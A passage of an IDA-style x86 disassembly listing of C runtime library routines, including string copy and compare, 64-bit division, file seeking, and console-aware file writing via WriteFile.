mov esi, ecx
jmp short loc_409941
; ---------------------------------------------------------------------------
loc_40998D: ; CODE XREF: sub_409922+59�j
xor eax, eax
loc_40998F: ; CODE XREF: sub_409922+2E�j
pop edi
pop esi
pop ebx
retn
sub_409922 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409993 proc near ; CODE XREF: sub_405D62+F1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp [ebp+arg_C], ebx
push edi
jnz short loc_4099B3
cmp esi, ebx
jnz short loc_4099B7
cmp [ebp+arg_4], ebx
jnz short loc_4099BE
loc_4099AC: ; CODE XREF: sub_409993+4D�j
; sub_409993+8C�j
xor eax, eax
loc_4099AE: ; CODE XREF: sub_409993+44�j
; sub_409993+9E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4099B3: ; CODE XREF: sub_409993+E�j
cmp esi, ebx
jz short loc_4099BE
loc_4099B7: ; CODE XREF: sub_409993+12�j
mov edi, [ebp+arg_4]
cmp edi, ebx
ja short loc_4099D9
loc_4099BE: ; CODE XREF: sub_409993+17�j
; sub_409993+22�j ...
call sub_403F8F
push 16h
pop esi
mov [eax], esi
loc_4099C8: ; CODE XREF: sub_409993+B1�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_404E8B
add esp, 14h
mov eax, esi
jmp short loc_4099AE
; ---------------------------------------------------------------------------
loc_4099D9: ; CODE XREF: sub_409993+29�j
cmp [ebp+arg_C], ebx
jnz short loc_4099E2
mov [esi], bl
jmp short loc_4099AC
; ---------------------------------------------------------------------------
loc_4099E2: ; CODE XREF: sub_409993+49�j
mov edx, [ebp+arg_8]
cmp edx, ebx
jnz short loc_4099ED
mov [esi], bl
jmp short loc_4099BE
; ---------------------------------------------------------------------------
loc_4099ED: ; CODE XREF: sub_409993+54�j
cmp [ebp+arg_C], 0FFFFFFFFh
mov eax, esi
jnz short loc_409A04
loc_4099F5: ; CODE XREF: sub_409993+6D�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_409A1D
dec edi
jnz short loc_4099F5
jmp short loc_409A1D
; ---------------------------------------------------------------------------
loc_409A04: ; CODE XREF: sub_409993+60�j
; sub_409993+81�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_409A16
dec edi
jz short loc_409A16
dec [ebp+arg_C]
jnz short loc_409A04
loc_409A16: ; CODE XREF: sub_409993+79�j
; sub_409993+7C�j
cmp [ebp+arg_C], ebx
jnz short loc_409A1D
mov [eax], bl
loc_409A1D: ; CODE XREF: sub_409993+6A�j
; sub_409993+6F�j ...
cmp edi, ebx
jnz short loc_4099AC
cmp [ebp+arg_C], 0FFFFFFFFh
jnz short loc_409A36
mov eax, [ebp+arg_4]
push 50h
mov [esi+eax-1], bl
pop eax
jmp loc_4099AE
; ---------------------------------------------------------------------------
loc_409A36: ; CODE XREF: sub_409993+92�j
mov [esi], bl
call sub_403F8F
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_4099C8
sub_409993 endp
; =============== S U B R O U T I N E =======================================
sub_409A46 proc near ; CODE XREF: sub_405D62+27�p
; sub_405D62+38�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jl short loc_409A6F
cmp ecx, 2
jle short loc_409A62
cmp ecx, 3
jnz short loc_409A6F
mov eax, dword_41141C
pop esi
retn
; ---------------------------------------------------------------------------
loc_409A62: ; CODE XREF: sub_409A46+E�j
mov eax, dword_41141C
mov dword_41141C, ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_409A6F: ; CODE XREF: sub_409A46+9�j
; sub_409A46+13�j
call sub_403F8F
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
sub_409A46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A8C proc near ; CODE XREF: sub_409ADC+4D�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_40E6C0
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
mov [ebp+var_1C], 1
jmp short loc_409ACC
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_409AC1
cmp eax, 0C000001Dh
jz short loc_409AC1
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_409AC1: ; CODE XREF: sub_409A8C+29�j
; sub_409A8C+30�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and [ebp+var_1C], 0
loc_409ACC: ; CODE XREF: sub_409A8C+1B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_409A8C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409ADC proc near ; CODE XREF: sub_4060D1+7�p sub_409B3C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
xor eax, eax
push ebx
mov [ebp+var_4], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
push ebx
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_409B1F
push ecx
popf
xor eax, eax
cpuid
mov [ebp+var_C], eax
mov [ebp+var_18], ebx
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, 1
cpuid
mov [ebp+var_4], edx
mov [ebp+var_8], eax
loc_409B1F: ; CODE XREF: sub_409ADC+22�j
pop ebx
test [ebp+var_4], 4000000h
jz short loc_409B37
call sub_409A8C
test eax, eax
jz short loc_409B37
xor eax, eax
inc eax
jmp short loc_409B39
; ---------------------------------------------------------------------------
loc_409B37: ; CODE XREF: sub_409ADC+4B�j
; sub_409ADC+54�j
xor eax, eax
loc_409B39: ; CODE XREF: sub_409ADC+59�j
pop ebx
leave
retn
sub_409ADC endp
; =============== S U B R O U T I N E =======================================
sub_409B3C proc near ; DATA XREF: seg001:0040D234�o
call sub_409ADC
mov dword_413B84, eax
xor eax, eax
retn
sub_409B3C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409B50 proc near ; CODE XREF: sub_4061E9+47�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_409B9C
loc_409B60: ; CODE XREF: sub_409B50+3C�j
; sub_409B50+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_409B94
or al, al
jz short loc_409B90
cmp ah, [ecx+1]
jnz short loc_409B94
or ah, ah
jz short loc_409B90
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_409B94
or al, al
jz short loc_409B90
cmp ah, [ecx+3]
jnz short loc_409B94
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_409B60
mov edi, edi
loc_409B90: ; CODE XREF: sub_409B50+18�j
; sub_409B50+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_409B94: ; CODE XREF: sub_409B50+14�j
; sub_409B50+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_409B9C: ; CODE XREF: sub_409B50+E�j
test edx, 1
jz short loc_409BBC
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_409B94
add ecx, 1
or al, al
jz short loc_409B90
test edx, 2
jz short loc_409B60
loc_409BBC: ; CODE XREF: sub_409B50+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_409B94
or al, al
jz short loc_409B90
cmp ah, [ecx+1]
jnz short loc_409B94
or ah, ah
jz short loc_409B90
add ecx, 2
jmp short loc_409B60
sub_409B50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409BE0 proc near ; CODE XREF: sub_4067A5+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_409C02
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_409C43
; ---------------------------------------------------------------------------
loc_409C02: ; CODE XREF: sub_409BE0+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_409C10: ; CODE XREF: sub_409BE0+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_409C10
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_409C3E
cmp edx, [esp+8+arg_4]
ja short loc_409C3E
jb short loc_409C3F
cmp eax, [esp+8+arg_0]
jbe short loc_409C3F
loc_409C3E: ; CODE XREF: sub_409BE0+4E�j
; sub_409BE0+54�j
dec esi
loc_409C3F: ; CODE XREF: sub_409BE0+56�j
; sub_409BE0+5C�j
xor edx, edx
mov eax, esi
loc_409C43: ; CODE XREF: sub_409BE0+20�j
pop esi
pop ebx
retn 10h
sub_409BE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C48 proc near ; CODE XREF: sub_409CCB+CD�p
; sub_409DE4+DE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_40BA3E
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_409C7D
call sub_403F8F
mov dword ptr [eax], 9
loc_409C77: ; CODE XREF: sub_409C48+5E�j
mov eax, edi
mov edx, edi
jmp short loc_409CC7
; ---------------------------------------------------------------------------
loc_409C7D: ; CODE XREF: sub_409C48+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call dword_40D1B4 ; SetFilePointer
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_409CA8
call dword_40D050 ; RtlGetLastWin32Error
test eax, eax
jz short loc_409CA8
push eax
call sub_403FB5
pop ecx
jmp short loc_409C77
; ---------------------------------------------------------------------------
loc_409CA8: ; CODE XREF: sub_409C48+4B�j
; sub_409C48+55�j
mov eax, esi
and esi, 1Fh
imul esi, 38h
sar eax, 5
mov eax, dword_413A80[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_409CC7: ; CODE XREF: sub_409C48+33�j
pop edi
pop esi
leave
retn
sub_409C48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CCB proc near ; CODE XREF: sub_4068C4+116�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset dword_40E6E0
call __SEH_prolog4
or esi, 0FFFFFFFFh
mov [ebp+var_24], esi
mov [ebp+var_20], esi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_409D04
call sub_403FA2
and dword ptr [eax], 0
call sub_403F8F
mov dword ptr [eax], 9
loc_409CFB: ; CODE XREF: sub_409CCB+66�j
mov eax, esi
mov edx, esi
jmp loc_409DD4
; ---------------------------------------------------------------------------
loc_409D04: ; CODE XREF: sub_409CCB+1B�j
xor edi, edi
cmp eax, edi
jl short loc_409D12
cmp eax, dword_413A68
jb short loc_409D33
loc_409D12: ; CODE XREF: sub_409CCB+3D�j
call sub_403FA2
mov [eax], edi
call sub_403F8F
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_404E8B
add esp, 14h
jmp short loc_409CFB
; ---------------------------------------------------------------------------
loc_409D33: ; CODE XREF: sub_409CCB+45�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:413A80h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 38h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jnz short loc_409D79
call sub_403FA2
mov [eax], edi
call sub_403F8F
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_404E8B
add esp, 14h
or edx, 0FFFFFFFFh
mov eax, edx
jmp short loc_409DD4
; ---------------------------------------------------------------------------
loc_409D79: ; CODE XREF: sub_409CCB+86�j
push eax
call sub_40BAAF
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_409DA8
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C48
add esp, 10h
mov [ebp+var_24], eax
mov [ebp+var_20], edx
jmp short loc_409DC2
; ---------------------------------------------------------------------------
loc_409DA8: ; CODE XREF: sub_409CCB+BF�j
call sub_403F8F
mov dword ptr [eax], 9
call sub_403FA2
mov [eax], edi
or [ebp+var_24], 0FFFFFFFFh
or [ebp+var_20], 0FFFFFFFFh
loc_409DC2: ; CODE XREF: sub_409CCB+DB�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_409DDA
mov eax, [ebp+var_24]
mov edx, [ebp+var_20]
loc_409DD4: ; CODE XREF: sub_409CCB+34�j
; sub_409CCB+AC�j
call __SEH_epilog4
retn
sub_409CCB endp
; =============== S U B R O U T I N E =======================================
sub_409DDA proc near ; CODE XREF: sub_409CCB+FE�p
; DATA XREF: seg001:0040E6F8�o
push dword ptr [ebp+8]
call sub_40BB4F
pop ecx
retn
sub_409DDA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=518h
sub_409DE4 proc near ; CODE XREF: sub_40A3AA+9A�p
var_594 = dword ptr -594h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_56D = byte ptr -56Dh
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = byte ptr -564h
var_410 = byte ptr -410h
var_160 = byte ptr -160h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-518h]
sub esp, 594h
mov eax, dword_410440
xor eax, ebp
mov [ebp+518h+var_4], eax
mov eax, [ebp+518h+arg_4]
push esi
xor esi, esi
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_57C], eax
mov [ebp+518h+var_578], esi
mov [ebp+518h+var_580], esi
jnz short loc_409E20
xor eax, eax
jmp loc_40A394
; ---------------------------------------------------------------------------
loc_409E20: ; CODE XREF: sub_409DE4+33�j
cmp eax, esi
jnz short loc_409E4B
call sub_403FA2
mov [eax], esi
call sub_403F8F
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40A394
; ---------------------------------------------------------------------------
loc_409E4B: ; CODE XREF: sub_409DE4+3E�j
mov esi, [ebp+518h+arg_0]
push ebx
mov ebx, esi
and ebx, 1Fh
imul ebx, 38h
mov eax, esi
sar eax, 5
push edi
lea edi, ds:413A80h[eax*4]
mov eax, [edi]
add eax, ebx
mov cl, [eax+24h]
add cl, cl
sar cl, 1
cmp cl, 2
mov [ebp+518h+var_588], edi
mov [ebp+518h+var_56D], cl
jz short loc_409E82
cmp cl, 1
jnz short loc_409EB5
loc_409E82: ; CODE XREF: sub_409DE4+97�j
mov ecx, [ebp+518h+arg_8]
not ecx
test cl, 1
jnz short loc_409EB5
call sub_403FA2
xor esi, esi
mov [eax], esi
call sub_403F8F
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
jmp loc_40A38A
; ---------------------------------------------------------------------------
loc_409EB5: ; CODE XREF: sub_409DE4+9C�j
; sub_409DE4+A9�j
test byte ptr [eax+4], 20h
jz short loc_409ECA
push 2
push 0
push 0
push esi
call sub_409C48
add esp, 10h
loc_409ECA: ; CODE XREF: sub_409DE4+D5�j
push esi
call sub_40A4CA
test eax, eax
pop ecx
jz loc_40A0CF
mov eax, [edi]
test byte ptr [ebx+eax+4], 80h
jz loc_40A0CF
call sub_4064E8
mov eax, [eax+6Ch]
xor ecx, ecx
cmp [eax+14h], ecx
lea eax, [ebp+518h+var_594]
setz cl
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
mov esi, ecx
call dword_40D1BC ; GetConsoleMode
test eax, eax
jz loc_40A0CF
test esi, esi
jz short loc_409F1D
cmp [ebp+518h+var_56D], 0
jz loc_40A0CF
loc_409F1D: ; CODE XREF: sub_409DE4+12D�j
call dword_40D1B8 ; GetConsoleCP
and [ebp+518h+var_568], 0
cmp [ebp+518h+arg_8], 0
mov esi, [ebp+518h+var_57C]
mov [ebp+518h+var_594], eax
mov [ebp+518h+var_58C], esi
jbe loc_40A33C
and [ebp+518h+var_574], 0
jmp short loc_409F46
; ---------------------------------------------------------------------------
loc_409F43: ; CODE XREF: sub_409DE4+2E0�j
mov esi, [ebp+518h+var_58C]
loc_409F46: ; CODE XREF: sub_409DE4+15D�j
mov al, [ebp+518h+var_56D]
test al, al
jnz loc_40A057
mov al, [esi]
xor ecx, ecx
cmp al, 0Ah
setz cl
movsx eax, al
push eax
mov [ebp+518h+var_590], ecx
call sub_40A8BC
test eax, eax
pop ecx
jnz short loc_409F85
push 1
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40BD46
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40A332
jmp short loc_409FB5
; ---------------------------------------------------------------------------
loc_409F85: ; CODE XREF: sub_409DE4+185�j
mov eax, [ebp+518h+var_57C]
sub eax, esi
add eax, [ebp+518h+arg_8]
cmp eax, 1
jbe loc_40A332
push 2
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40BD46
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40A332
inc esi
inc [ebp+518h+var_574]
loc_409FB5: ; CODE XREF: sub_409DE4+19F�j
xor eax, eax
push eax
push eax
push 5
lea ecx, [ebp+518h+var_C]
push ecx
push 1
lea ecx, [ebp+518h+var_56C]
push ecx
push eax
push [ebp+518h+var_594]
inc esi
inc [ebp+518h+var_574]
mov [ebp+518h+var_58C], esi
call dword_40D19C ; WideCharToMultiByte
mov esi, eax
test esi, esi
jz loc_40A332
push 0
lea eax, [ebp+518h+var_568]
push eax
push esi
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call dword_40D148 ; WriteFile
test eax, eax
jz loc_40A329
mov eax, [ebp+518h+var_568]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40A332
cmp [ebp+518h+var_590], 0
jz loc_40A0BB
push 0
lea eax, [ebp+518h+var_568]
push eax
push 1
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
mov [ebp+518h+var_C], 0Dh
push dword ptr [ebx+eax]
call dword_40D148 ; WriteFile
test eax, eax
jz loc_40A329
cmp [ebp+518h+var_568], 1
jl loc_40A332
inc [ebp+518h+var_580]
inc [ebp+518h+var_578]
jmp short loc_40A0BB
; ---------------------------------------------------------------------------
loc_40A057: ; CODE XREF: sub_409DE4+167�j
cmp al, 1
jz short loc_40A05F
cmp al, 2
jnz short loc_40A07A
loc_40A05F: ; CODE XREF: sub_409DE4+275�j
movzx ecx, word ptr [esi]
xor edx, edx
cmp cx, 0Ah
setz dl
inc esi
inc esi
add [ebp+518h+var_574], 2
mov [ebp+518h+var_56C], ecx
mov [ebp+518h+var_58C], esi
mov [ebp+518h+var_590], edx
loc_40A07A: ; CODE XREF: sub_409DE4+279�j
cmp al, 1
jz short loc_40A082
cmp al, 2
jnz short loc_40A0BB
loc_40A082: ; CODE XREF: sub_409DE4+298�j
push [ebp+518h+var_56C]
call sub_40BB71
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40A329
inc [ebp+518h+var_578]
cmp [ebp+518h+var_590], 0
jz short loc_40A0BB
push 0Dh
pop eax
push eax
mov [ebp+518h+var_56C], eax
call sub_40BB71
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40A329
inc [ebp+518h+var_578]
inc [ebp+518h+var_580]
loc_40A0BB: ; CODE XREF: sub_409DE4+232�j
; sub_409DE4+271�j ...
mov eax, [ebp+518h+arg_8]
cmp [ebp+518h+var_574], eax
jb loc_409F43
jmp loc_40A332
; ---------------------------------------------------------------------------
loc_40A0CF: ; CODE XREF: sub_409DE4+EF�j
; sub_409DE4+FC�j ...
mov eax, [edi]
add eax, ebx
test byte ptr [eax+4], 80h
jz loc_40A302
mov eax, [ebp+518h+var_57C]
xor esi, esi
cmp [ebp+518h+var_56D], 0
mov [ebp+518h+var_56C], esi
jnz loc_40A180
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40A363
loc_40A0FE: ; CODE XREF: sub_409DE4+395�j
mov ecx, [ebp+518h+var_568]
and [ebp+518h+var_574], 0
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40A10B: ; CODE XREF: sub_409DE4+354�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40A13A
mov edx, [ebp+518h+var_568]
inc [ebp+518h+var_568]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_40A12B
inc [ebp+518h+var_580]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+518h+var_574]
loc_40A12B: ; CODE XREF: sub_409DE4+33B�j
mov [eax], dl
inc eax
inc [ebp+518h+var_574]
cmp [ebp+518h+var_574], 400h
jb short loc_40A10B
loc_40A13A: ; CODE XREF: sub_409DE4+32D�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call dword_40D148 ; WriteFile
test eax, eax
jz loc_40A329
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40A332
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb short loc_40A0FE
jmp loc_40A332
; ---------------------------------------------------------------------------
loc_40A180: ; CODE XREF: sub_409DE4+305�j
cmp [ebp+518h+var_56D], 2
jnz loc_40A227
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40A363
loc_40A199: ; CODE XREF: sub_409DE4+438�j
mov ecx, [ebp+518h+var_568]
xor esi, esi
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40A1A4: ; CODE XREF: sub_409DE4+3F7�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40A1DD
mov edx, [ebp+518h+var_568]
add [ebp+518h+var_568], 2
movzx edx, word ptr [edx]
inc ecx
inc ecx
cmp dx, 0Ah
jnz short loc_40A1CB
add [ebp+518h+var_580], 2
mov word ptr [eax], 0Dh
inc eax
inc eax
inc esi
inc esi
loc_40A1CB: ; CODE XREF: sub_409DE4+3D8�j
mov edi, [ebp+518h+var_588]
mov [eax], dx
inc eax
inc eax
inc esi
inc esi
cmp esi, 3FFh
jb short loc_40A1A4
loc_40A1DD: ; CODE XREF: sub_409DE4+3C6�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call dword_40D148 ; WriteFile
test eax, eax
jz loc_40A329
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40A332
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb loc_40A199
jmp loc_40A332
; ---------------------------------------------------------------------------
loc_40A227: ; CODE XREF: sub_409DE4+3A0�j
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_574], eax
jbe loc_40A363
loc_40A236: ; CODE XREF: sub_409DE4+516�j
mov ecx, [ebp+518h+var_574]
and [ebp+518h+var_568], 0
sub ecx, [ebp+518h+var_57C]
push 2
lea eax, [ebp+518h+var_160]
pop esi
loc_40A249: ; CODE XREF: sub_409DE4+497�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40A27D
mov edx, [ebp+518h+var_574]
movzx edx, word ptr [edx]
add [ebp+518h+var_574], esi
add ecx, esi
cmp dx, 0Ah
jnz short loc_40A26C
mov word ptr [eax], 0Dh
add eax, esi
add [ebp+518h+var_568], esi
loc_40A26C: ; CODE XREF: sub_409DE4+47C�j
add [ebp+518h+var_568], esi
mov [eax], dx
add eax, esi
cmp [ebp+518h+var_568], 152h
jb short loc_40A249
loc_40A27D: ; CODE XREF: sub_409DE4+46B�j
xor esi, esi
push esi
push esi
push 2ABh
lea ecx, [ebp+518h+var_410]
push ecx
lea ecx, [ebp+518h+var_160]
sub eax, ecx
cdq
sub eax, edx
sar eax, 1
push eax
mov eax, ecx
push eax
push esi
push 0FDE9h
call dword_40D19C ; WideCharToMultiByte
mov edi, eax
cmp edi, esi
jz short loc_40A329
loc_40A2B0: ; CODE XREF: sub_409DE4+4F6�j
push 0
lea eax, [ebp+518h+var_584]
push eax
mov eax, edi
sub eax, esi
push eax
lea eax, [ebp+esi+518h+var_410]
push eax
mov eax, [ebp+518h+var_588]
mov eax, [eax]
push dword ptr [ebx+eax]
call dword_40D148 ; WriteFile
test eax, eax
jz short loc_40A2DE
add esi, [ebp+518h+var_584]
cmp edi, esi
jg short loc_40A2B0
jmp short loc_40A2E7
; ---------------------------------------------------------------------------
loc_40A2DE: ; CODE XREF: sub_409DE4+4EF�j
call dword_40D050 ; RtlGetLastWin32Error
mov [ebp+518h+var_56C], eax
loc_40A2E7: ; CODE XREF: sub_409DE4+4F8�j
cmp edi, esi
jg short loc_40A332
mov eax, [ebp+518h+var_574]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
mov [ebp+518h+var_578], eax
jb loc_40A236
jmp short loc_40A332
; ---------------------------------------------------------------------------
loc_40A302: ; CODE XREF: sub_409DE4+2F3�j
push 0
lea ecx, [ebp+518h+var_584]
push ecx
push [ebp+518h+arg_8]
push [ebp+518h+var_57C]
push dword ptr [eax]
call dword_40D148 ; WriteFile
test eax, eax
jz short loc_40A329
mov eax, [ebp+518h+var_584]
and [ebp+518h+var_56C], 0
mov [ebp+518h+var_578], eax
jmp short loc_40A332
; ---------------------------------------------------------------------------
loc_40A329: ; CODE XREF: sub_409DE4+21A�j
; sub_409DE4+25B�j ...
call dword_40D050 ; RtlGetLastWin32Error
mov [ebp+518h+var_56C], eax
loc_40A332: ; CODE XREF: sub_409DE4+199�j
; sub_409DE4+1AF�j ...
mov eax, [ebp+518h+var_578]
test eax, eax
jnz short loc_40A38F
mov edi, [ebp+518h+var_588]
loc_40A33C: ; CODE XREF: sub_409DE4+153�j
xor esi, esi
cmp [ebp+518h+var_56C], esi
jz short loc_40A363
push 5
pop esi
cmp [ebp+518h+var_56C], esi
jnz short loc_40A358
call sub_403F8F
mov dword ptr [eax], 9
jmp short loc_40A383
; ---------------------------------------------------------------------------
loc_40A358: ; CODE XREF: sub_409DE4+565�j
push [ebp+518h+var_56C]
call sub_403FB5
pop ecx
jmp short loc_40A38A
; ---------------------------------------------------------------------------
loc_40A363: ; CODE XREF: sub_409DE4+314�j
; sub_409DE4+3AF�j ...
mov eax, [edi]
test byte ptr [ebx+eax+4], 40h
jz short loc_40A378
mov eax, [ebp+518h+var_57C]
cmp byte ptr [eax], 1Ah
jnz short loc_40A378
xor eax, eax
jmp short loc_40A392
; ---------------------------------------------------------------------------
loc_40A378: ; CODE XREF: sub_409DE4+586�j
; sub_409DE4+58E�j
call sub_403F8F
mov dword ptr [eax], 1Ch
loc_40A383: ; CODE XREF: sub_409DE4+572�j
call sub_403FA2
mov [eax], esi
loc_40A38A: ; CODE XREF: sub_409DE4+CC�j
; sub_409DE4+57D�j
or eax, 0FFFFFFFFh
jmp short loc_40A392
; ---------------------------------------------------------------------------
loc_40A38F: ; CODE XREF: sub_409DE4+553�j
sub eax, [ebp+518h+var_580]
loc_40A392: ; CODE XREF: sub_409DE4+592�j
; sub_409DE4+5A9�j
pop edi
pop ebx
loc_40A394: ; CODE XREF: sub_409DE4+37�j
; sub_409DE4+62�j
mov ecx, [ebp+518h+var_4]
xor ecx, ebp
pop esi
call sub_403F45
add ebp, 518h
leave
retn
sub_409DE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
